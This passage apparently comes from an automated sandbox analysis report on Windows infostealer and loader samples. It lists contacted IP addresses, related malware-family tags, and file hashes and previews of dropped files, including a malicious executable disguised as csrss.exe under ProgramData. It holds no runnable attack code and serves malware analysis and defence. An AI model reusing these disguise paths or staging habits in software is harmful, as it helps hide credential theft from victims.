                                                                                                                                                                                                                                                                                                                                • 64.91.249.20
                                                                                                                                                                                                                                                                                                                                • 104.17.62.50
                                                                                                                                                                                                                                                                                                                                • 138.197.59.199
                                                                                                                                                                                                                                                                                                                                • 18.200.3.224
                                                                                                                                                                                                                                                                                                                                • 186.113.7.204
                                                                                                                                                                                                                                                                                                                                • 104.26.8.17
                                                                                                                                                                                                                                                                                                                                • 82.221.28.171
                                                                                                                                                                                                                                                                                                                                • 103.224.182.210
                                                                                                                                                                                                                                                                                                                                • 104.21.60.188
                                                                                                                                                                                                                                                                                                                                • 172.66.40.88
                                                                                                                                                                                                                                                                                                                                • 172.67.170.147
                                                                                                                                                                                                                                                                                                                                • 36.255.71.45
                                                                                                                                                                                                                                                                                                                                • 138.66.39.205
                                                                                                                                                                                                                                                                                                                                • 104.22.43.158
                                                                                                                                                                                                                                                                                                                                • 47.246.167.169
                                                                                                                                                                                                                                                                                                                                • 31.216.144.5
                                                                                                                                                                                                                                                                                                                                • 201.134.41.61
                                                                                                                                                                                                                                                                                                                                • 164.100.128.15
                                                                                                                                                                                                                                                                                                                                • 162.159.136.232
                                                                                                                                                                                                                                                                                                                                • 179.51.70.125
                                                                                                                                                                                                                                                                                                                                • 54.75.198.169
                                                                                                                                                                                                                                                                                                                                • 142.250.105.84
                                                                                                                                                                                                                                                                                                                                • 104.21.85.95
                                                                                                                                                                                                                                                                                                                                • 13.249.120.86
                                                                                                                                                                                                                                                                                                                                • 184.25.164.103
                                                                                                                                                                                                                                                                                                                                • 35.186.223.180
                                                                                                                                                                                                                                                                                                                                • 44.199.96.179
                                                                                                                                                                                                                                                                                                                                • 195.85.23.95
                                                                                                                                                                                                                                                                                                                                • 172.66.41.20
                                                                                                                                                                                                                                                                                                                                • 104.18.41.153
                                                                                                                                                                                                                                                                                                                                • 3.161.136.69
                                                                                                                                                                                                                                                                                                                                • 162.159.135.232
                                                                                                                                                                                                                                                                                                                                • 3.163.115.86
                                                                                                                                                                                                                                                                                                                                • 3.161.150.89
                                                                                                                                                                                                                                                                                                                                • 104.21.14.245
                                                                                                                                                                                                                                                                                                                                • 44.195.133.145
                                                                                                                                                                                                                                                                                                                                • 172.203.148.34
                                                                                                                                                                                                                                                                                                                                • 41.33.126.100
                                                                                                                                                                                                                                                                                                                                • 31.13.88.35
                                                                                                                                                                                                                                                                                                                                • 164.100.213.210
                                                                                                                                                                                                                                                                                                                                • 170.114.52.4
                                                                                                                                                                                                                                                                                                                                • 23.4.32.216
                                                                                                                                                                                                                                                                                                                                • 54.158.51.60
                                                                                                                                                                                                                                                                                                                                • 20.192.98.160
                                                                                                                                                                                                                                                                                                                                • 170.114.52.2
                                                                                                                                                                                                                                                                                                                                • 172.67.184.59
                                                                                                                                                                                                                                                                                                                                • 192.185.5.23
                                                                                                                                                                                                                                                                                                                                • 45.60.0.44
                                                                                                                                                                                                                                                                                                                                • 172.67.148.124
                                                                                                                                                                                                                                                                                                                                • 104.21.5.25
                                                                                                                                                                                                                                                                                                                                • 185.51.191.48
                                                                                                                                                                                                                                                                                                                                • 31.13.65.7
                                                                                                                                                                                                                                                                                                                                • 3.161.136.2
                                                                                                                                                                                                                                                                                                                                • 200.108.110.164
                                                                                                                                                                                                                                                                                                                                • 3.141.96.53
                                                                                                                                                                                                                                                                                                                                • 104.21.34.34
                                                                                                                                                                                                                                                                                                                                • 185.78.166.130
                                                                                                                                                                                                                                                                                                                                • 20.231.114.24
                                                                                                                                                                                                                                                                                                                                • 96.7.224.178
                                                                                                                                                                                                                                                                                                                                • 54.183.63.241
                                                                                                                                                                                                                                                                                                                                • 44.233.131.115
                                                                                                                                                                                                                                                                                                                                • 172.67.214.175
                                                                                                                                                                                                                                                                                                                                • 104.18.32.109
                                                                                                                                                                                                                                                                                                                                • 87.233.198.20
                                                                                                                                                                                                                                                                                                                                • 163.247.44.239
                                                                                                                                                                                                                                                                                                                                • 172.66.43.117
                                                                                                                                                                                                                                                                                                                                • 179.191.175.66
                                                                                                                                                                                                                                                                                                                                83d60721ecc423892660e275acc4dffdzbnq9rGNLi.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116
                                                                                                                                                                                                                                                                                                                                5Yzloz244r.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116
                                                                                                                                                                                                                                                                                                                                e5eFd2bt37.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116
                                                                                                                                                                                                                                                                                                                                nxMV6rcvii.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116
                                                                                                                                                                                                                                                                                                                                DzVuoFusnL.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116
                                                                                                                                                                                                                                                                                                                                38gmTjpc3Y.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116
                                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116
                                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116
                                                                                                                                                                                                                                                                                                                                Gcn7BdFE9N.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116
                                                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousGlupteba, SmokeLoader, Socks5Systemz, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                • 85.215.196.116

                                                                                                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exezbnq9rGNLi.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                  5Yzloz244r.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                    e5eFd2bt37.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\freebl3.dllrNUBzMB8Cm.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, Glupteba, RedLine, SmokeLoader, StealcBrowse
                                                                                                                                                                                                                                                                                                                                        uvEXXJGeMd.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                          0Rajeau4sd.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                            epQiTcNFEp.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                              5Yzloz244r.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                                e5eFd2bt37.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                                  OPnywcBrh6.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                    3vEtFxRJ9c.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                      1fXeff6C8A.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                        hqsQzin1r6.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\Drivers\csrss.exezbnq9rGNLi.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                                            5Yzloz244r.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                                                                                                                                                                                                              e5eFd2bt37.exeGet hashmaliciousLummaC, CryptOne, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse

                                                                                                                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\CAAAAFBK

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                                                                                                                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                                                                                                                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                                                                                                                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\CAFIEBKKJJDAKFHIDBFHJDBFBA

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                                                                                                                                                MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                                                                                                                                                SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                                                                                                                                                SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\CZQKSDDMWR.xlsx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.700739677288544
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:ppydEKvTSBiqFHi8v+wyNV+fxloGJjN3y5j1xTEC3ugbIvso8wFjas:rmEKvMiYC8Wwyr88GFAH/UvsuZl
                                                                                                                                                                                                                                                                                                                                                                MD5:57582F5B6AE65D8DFCBD4A26382C6138
                                                                                                                                                                                                                                                                                                                                                                SHA1:DC27AD5E54D1BDCCA4EC0D54ED1FB5A3235E9842
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7918D6E76741E42934BB32547E2D7EA395304AEA3383C0E6B7FCF82ACE125749
                                                                                                                                                                                                                                                                                                                                                                SHA-512:6D75F68E608CB12378605F06C74F2F0414486072CC25961A1EA421B94EA5827F92110B902C2190E04AAE2D79152B0AB9B5B1ACECDCAAADD93A6F25028DD1E060
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:CZQKSDDMWRVXFLQDZCLIIZCHKUTASMCLXARWUFPBFEESBCKPMBKHTZOAVUSGWGQBPZXNCLVHGKNWOAOTOSOFYOKUZEGHVYFBBGTMFWOOTOTSLTKZBTPTBZMUKYOSGWCRRYGDZWOEMUMCRRCZIEIYJAYGXMDKNOLEIKRXPEZKZGIXGYJYIBDXPZGYVGHMUCSHXXAYXQQNWIVOLMGKTXTGEAEKAOKQQSCTUWFEFQMLQUREMQDBYWFEQOMAJXVXIMMKWJJFKSSTMQZNWPBIQBZROXFYPWCYBVRMKUOGMEJJHYTWCOZYZXVANCHSTYZHRBVSORLGLSOWPDGEBVMQLDWKSLQFPEZDXWPZYNPSNTKGPNKUHFMAEGDWSDLCDNYFQZWURNIMQZDJNJPPOXINSGMUVHRDBWXOXDRPWKGITAKUVBIDIBIWIIANONNQUMKNATQWTVSOUCLOFKCCAISNABSKDPLNCYIQIFQMVEHZLIAFYDDSJJTQSUEVQKACGQHHXCYTZJABESDNXLIPGYKWXJZQWYJMSZUZHKYCGKQIKCYIWZOHAVHKCRNACDVNLPEXUPOQVKBGVFKCQDKJPNALRMAYMZRBAGMTICYZEFMXXYLDXTMKSZLDKSKSRQTDUDGFZXFQEHEDXVFBYBNEOVKFLNIRSTGZDIJXNRZEZFJHNPZDGPGECJTHNVMTSURANVWOVRBTYGZGIPOXWTRIHNKWFKCTXVVKOFHISZVHNVVRXJGJEZEJDSCKNIDUQYQWFNDXBQQJAYENVZXKXVUERYEPFEGNWBAJHHQSAFTHXGXMHUHJVQEYGVKPBTQMWUEZMBBSFENGBBVZIYHLXFRDPALQUURINJMTQGTPGJRGIWXIXWOPVDTWDBDNJJVXOPMTWAGMWQFUPMRROBBTRTOQBMZKPGWTYPWAVOKTSPLMOWJJDVZIIDATCEGNLHPVRONAQJFLFUZXJVRXMCGQNRKTYBRGRMKBPVPQSPFOIOHXGEGDHOJP

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\DHDHCGHDHIDHCBGCBGCAEBAKEH

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0357803477377646
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                                                                                                                                                                                                MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                                                                                                                                                                                                SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                                                                                                                                                                                                SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                                                                                                                                                                                                SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Drivers\csrss.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1998848
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9427880780763775
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:v1r2g+mLqqeaVjSeluJsslFHfjeKgHEaVjsKHzG:drz+OqjXeluJxlFHf6zHj
                                                                                                                                                                                                                                                                                                                                                                MD5:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                                                                                                                                                                                                                SHA1:50992F712B281DB70518E6D404084E26DCD98B98
                                                                                                                                                                                                                                                                                                                                                                SHA-256:A1480E23BD2A89B188FB01138EF2F54130F2DC41CE85FF9319AB7F15471B0011
                                                                                                                                                                                                                                                                                                                                                                SHA-512:18A2FA6E9C97281328DE819126DCCB6CC8576E11EA11A8FABA629DA58E724040427C7D941CE0F935948195C30DA6D60A6873D7E3E9613EBA7DF42BDE1A3ABA1F
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                                • Filename: zbnq9rGNLi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 5Yzloz244r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: e5eFd2bt37.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U..............~.......~.%.....~...}.....(.........y...~.......~.!.....~.&.....Rich............................PE..L...}N.d............................,........0....@..........................0.......v.......................................\..P....0..0...................................................hW...... W..@............0...............................text............................... ..`.rdata...5...0...6..................@..@.data...D....p..."...T..............@....fofufe.|............v..............@....tls.................x..............@....safaz....... ......................@....rsrc...0....0......................@..@........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\EWZCVGNOWT.docx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.690071120548773
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                                                                                                                                                                                                                                                                                                MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                                                                                                                                                                                                                                                                                                SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                                                                                                                                                                                                                                                                                                SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                                                                                                                                                                                                                                                                                                SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\FCAAAAFB

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                                                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                                                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                                                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                                                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\GAOBCVIQIJ.docx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.701188456968639
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                                                                                                                                                                                                                                                                                                                MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                                                                                                                                                                                                                                                                                                                SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                                                                                                                                                                                                                                                                                                                SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                                                                                                                                                                                                                                                                                                                SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\GHDAAKJEGCFCAKEBKJJE

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
